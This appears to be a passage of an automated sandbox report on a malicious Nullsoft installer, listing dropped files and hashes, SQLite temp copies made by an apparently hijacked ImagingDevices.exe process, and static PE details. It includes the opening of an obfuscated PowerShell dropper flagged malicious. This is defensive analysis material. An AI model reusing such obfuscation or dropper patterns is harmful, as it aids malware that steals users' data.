                          Entropy (8bit):0.8486279078348049
                          Encrypted:false
                          SSDEEP:
                          MD5:975EB5A66B745A4E80F115C4E014A785
                          SHA1:5E06CC0DD91C0D9B5FA9F446175EAA2E72E20172
                          SHA-256:49CC538CF3E5B29BCE4D7D2905042BA38571947AC433BEBDEF58B43874BA84D3
                          SHA-512:AF3DA4A55F599595696FB869F23A77010C7009E8832E260A0B70271EA41DFCFE3371D3FAB39B60DF1B274E1085862D39AA6388937DADB1F12F5323C0513A5721
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmp9256.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):40960
                          Entropy (8bit):0.8553638852307782
                          Encrypted:false
                          SSDEEP:
                          MD5:28222628A3465C5F0D4B28F70F97F482
                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmp976F.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):20480
                          Entropy (8bit):0.37202887060507356
                          Encrypted:false
                          SSDEEP:
                          MD5:4D950F6445B3766514BA266D6B1F3325
                          SHA1:1C2B99FFD0C9130C0B51DA5349A258CA8B92F841
                          SHA-256:765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
                          SHA-512:AD0F8D47ABBD2412DC82F292BE5311C474E0B18C1022CAAE351A87ECD8C76A136831D4B5303C91DF0F8E68A09C8554E378191782AA8F142A7351EDB0EEF65A93
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmp9F86.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):20480
                          Entropy (8bit):0.3528485475628876
                          Encrypted:false
                          SSDEEP:
                          MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
                          SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
                          SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
                          SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmp9FB6.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                          Category:modified
                          Size (bytes):196608
                          Entropy (8bit):1.1216922126537057
                          Encrypted:false
                          SSDEEP:
                          MD5:7F784E8E9051D8E70834C231AE5CC670
                          SHA1:FA92DDE2E8DD8599EA458CC8488123CB60AD0DC1
                          SHA-256:1CEE1D9084D2C05B68B40073E4E6FE380128B61988409D60A9F5CBFD7AE964F6
                          SHA-512:A054A1E0F3289F4CCD25F01A81C0B3471A2CA8243E76ADD24D105A4141FBC534D20CE913A796474FB17754AB3B87C56679B8962FB860060B23F467601043EEA7
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmpBA4B.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):51200
                          Entropy (8bit):0.8746135976761988
                          Encrypted:false
                          SSDEEP:
                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmpE29F.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                          Category:dropped
                          Size (bytes):106496
                          Entropy (8bit):1.1371512776121733
                          Encrypted:false
                          SSDEEP:
                          MD5:46A8B7CD1CB434A5C8CE3CF3C7825DD9
                          SHA1:518804A81A13456A077723A4384FBD2E20EFD1BF
                          SHA-256:9E18C03AD835DCA2E633226FDA3D0DE1FA4B46D9AAAA80FCA6D79FF4EC296B76
                          SHA-512:86B5DFAAF334756E422847DD33DB7CC4CCE68A7C817F9523F0976F57357B0A1D156C53886F1BA99EEA9375FBF10E08246EE8EFB7CFAD7D092B888EE7F85F5BD7
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmpF0C5.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):159744
                          Entropy (8bit):0.5394293526345721
                          Encrypted:false
                          SSDEEP:
                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmpFE3A.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                          Category:dropped
                          Size (bytes):155648
                          Entropy (8bit):0.5407252242845243
                          Encrypted:false
                          SSDEEP:
                          MD5:7B955D976803304F2C0505431A0CF1CF
                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Curan158\Housty\begrets.inc

                          Download File
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1245
                          Entropy (8bit):5.462849750105637
                          Encrypted:false
                          SSDEEP:
                          MD5:5343C1A8B203C162A3BF3870D9F50FD4
                          SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                          SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                          SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                          Malicious:false
                          Reputation:unknown
                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

                          C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Maeterlinck.Mid152

                          Download File
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):342576
                          Entropy (8bit):7.62696842529225
                          Encrypted:false
                          SSDEEP:
                          MD5:8817ABE755D6155C0CE5F1C47ED41304
                          SHA1:2696075A18D76B6730BCCC14AF891DE3EAC88C5D
                          SHA-256:DBFBB6848571304DC04BEC19EF733105388887EDA1DC52C7DBB605815B67C9AC
                          SHA-512:207B37C95C2F659466A041C8317DCA557558BEE46DFBA8D2514C86DA8B2950423CE739964B7CFB896D46D99BE08FC0257985DC9E98C48AB5C7E0B3D8A7EE84DF
                          Malicious:false
                          Reputation:unknown
                          Preview:........ppp.11.jj.....m......."""..........JJ......R.mm.E.....===......C...../.....................................555............E..........X...D..NN.......oo......SS............9.......................&.......==.N.&&&&&...00.'.........._..........................%%%...3..RR.................8..HH..\\....................ww.......CC...444....ZZZZ.??........3.?.CCC.................].^^^.....................n......>.j......?......... ........AAA..........l......A..R....dd.......................A..................................!!................f..........................ee........-.c...............$$..^....ooo......+...O..M..;;..D........I....... .bb.....<<........................V....................8..................<<<..i....A.................D..........A...................................$$$$....2..k.]........................;.....q....9.M..............??......||......ii..B.........11111.......R.........__......................NN.**.......w....................x.......\...........

                          C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo

                          Download File
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:ASCII text, with very long lines (60465), with no line terminators
                          Category:dropped
                          Size (bytes):60465
                          Entropy (8bit):5.3309906174569255
                          Encrypted:false
                          SSDEEP:
                          MD5:32C7272D1BC1F9F0AF8AF047E4F2732C
                          SHA1:52F89038555C67A8FCDD6F415F0951990ED01ABB
                          SHA-256:A6FFF8637295C331DFC91CE1686C05030AA64AD94538B8CDC29AE58F4DCDE34C
                          SHA-512:AAD99BDB99F92972BD75AA6DCB6E35BB77AF22F5435AEA460AFE943819D559699102589FBDB0ACA2D05FE003B03677AF5EB6E46513FF7225F0DD6C3F3EA4741A
                          Malicious:true
                          Reputation:unknown
                          Preview:$Espousal=$Interceptorborterer;<#ekviperinger Thingumadoodle Assized Overexcited #><#Elucidator Firetiden Velmente Misforstaaende Koreografer basos #><#Haremmers holosericeous Gainspeaker Jordemodertasker Ateleiosis Bache Kythes #><#Loranstationernes Levnedsmidlet Jernbanens Reaward Nighness Bloodless adoptivfader #><#Wong Puffet Taxiable Lithonephrotomy Husplaners Seership konomiklasses #><#Vigilantist Blyantstift unappropriation Hudstryg Aromatisering Eskadreflyvningerne whiggification #><#Nissers Weatherglass enroll Tilslutningspligt Omegnene Flyttegods Nonsane #><#melchora Freesias Fjerntliggendes Underleverandr #><#Tematiks Blddelsskaderne Rilles Eylevs Kolonnaders #><#Storeship Complexive Knhjder #><#Syditalien Trained Predestination #><#Opbakningers Paraguayanernes Boleweed guanases Ruternes Unsainted #><#Anraab Planetoidal Takujui Trocars #><#Encefalo Laccin Coincorporate Samech Townmen Rhabdopleura #><#Forskydeliges Retractor Siemens Mabonmamodron Pernitnes #><#Fluorometry Ram

                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):55
                          Entropy (8bit):4.306461250274409
                          Encrypted:false
                          SSDEEP:
                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Entropy (8bit):7.347225525195404
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 92.16%
                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:443'972 bytes
                          MD5:afaedf2ff4dc43d62b33b003a1a501ab
                          SHA1:9efe783f2dace329faa38ecefe77b6359dab3bd8
                          SHA256:1eccc2406bb9358ea0d3290d9b06433732fab544690fbeb65c93a3175ba30422
                          SHA512:2ec266dfd5e72123f000867980d925d16ffad858e8a9cf0650d67f97d111042b31720012dc03dcfb4c84017f7b2a51c984f0381132f3e9f8daab5a3b8eb98b75
                          SSDEEP:6144:C+K0etCRRspiYJIzlMwSGORbLAS2P/RBNBaOkqWs76w43bh1av8:LbRExcSRGrS2P/RBna7s7XSV
                          TLSH:8694F051F2D08897E41212B55C37EA352267FD1DA330563F226A7BE919733B320AB94F
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L......Q.................\...........0.......p....@

                          File Icon

                          Icon Hash:1c66d3c8721d0922

                          Static PE Info

                          General

                          Entrypoint:0x4030dc
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x51E30582 [Sun Jul 14 20:09:38 2013 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:b40f29cd171eb54c01b1dd2683c9c26b

                          Entrypoint Preview

                          Instruction
                          sub esp, 00000184h
                          push ebx
                          push ebp
                          push esi
                          xor ebx, ebx
                          push edi
                          mov dword ptr [esp+18h], ebx
                          mov dword ptr [esp+10h], 00409190h
                          mov dword ptr [esp+20h], ebx
                          mov byte ptr [esp+14h], 00000020h
                          call dword ptr [00407034h]
                          push 00008001h
                          call dword ptr [004070B0h]
                          push ebx
                          call dword ptr [0040728Ch]
                          push 00000008h
                          mov dword ptr [00423F78h], eax
                          call 00007FE08D1D98E8h
                          mov dword ptr [00423EC4h], eax
                          push ebx
                          lea eax, dword ptr [esp+38h]
                          push 00000160h
                          push eax
                          push ebx
                          push 0041F480h
                          call dword ptr [00407164h]
                          push 00409180h
                          push 004236C0h
                          call 00007FE08D1D9592h
                          call dword ptr [0040711Ch]
                          mov ebp, 00429000h
                          push eax
                          push ebp
                          call 00007FE08D1D9580h
                          push ebx
                          call dword ptr [00407114h]
                          cmp byte ptr [00429000h], 00000022h
                          mov dword ptr [00423EC0h], eax
                          mov eax, ebp
                          jne 00007FE08D1D6B7Ch
                          mov byte ptr [esp+14h], 00000022h
                          mov eax, 00429001h
                          push dword ptr [esp+14h]
                          push eax
                          call 00007FE08D1D902Dh
                          push eax
                          call dword ptr [00407220h]
                          mov dword ptr [esp+1Ch], eax
                          jmp 00007FE08D1D6C35h
                          cmp cl, 00000020h
                          jne 00007FE08D1D6B78h
                          inc eax
                          cmp byte ptr [eax], 00000020h
                          je 00007FE08D1D6B6Ch

                          Rich Headers

                          Programming Language:
                          • [EXP] VC++ 6.0 SP5 build 8804

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x330000x17ca8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x5a6c0x5c001c619949741a76b63a54c1e6c4d6b2f8False0.6611328125data6.414702071136453IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x70000x11ce0x12006c31e0693072284f258d2c4a271de506False0.4524739583333333OpenPGP Secret Key5.236327486414569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x90000x1afb80x40078f5760d9fafb71fdbc88c3497afef46False0.599609375data4.86113722933255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .ndata0x240000xf0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x330000x17ca80x17e0025adf7ace9c240327e220639de0ef340False0.1678358147905759data3.220423442186396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_BITMAP0x334000x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                          RT_ICON0x337680x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.12634567609132852
                          RT_ICON0x43f900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.2349585062240664
                          RT_ICON0x465380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.29362101313320826
                          RT_ICON0x475e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.20575692963752665
                          RT_ICON0x484880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.35204918032786886
                          RT_ICON0x48e100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.2098375451263538
                          RT_ICON0x496b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.1842485549132948
                          RT_ICON0x49c200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4512411347517731
                          RT_DIALOG0x4a0880x144dataEnglishUnited States0.5216049382716049
                          RT_DIALOG0x4a1d00x13cdataEnglishUnited States0.5506329113924051
                          RT_DIALOG0x4a3100x100dataEnglishUnited States0.5234375
                          RT_DIALOG0x4a4100x11cdataEnglishUnited States0.6056338028169014
                          RT_DIALOG0x4a5300xc4dataEnglishUnited States0.5918367346938775
                          RT_DIALOG0x4a5f80x60dataEnglishUnited States0.7291666666666666
                          RT_GROUP_ICON0x4a6580x76dataEnglishUnited States0.6864406779661016
                          RT_VERSION0x4a6d00x2d0dataEnglishUnited States0.5055555555555555
                          RT_MANIFEST0x4a9a00x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984

                          Imports

                          DLLImport
                          KERNEL32.dllSleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
                          USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                          ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                          ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States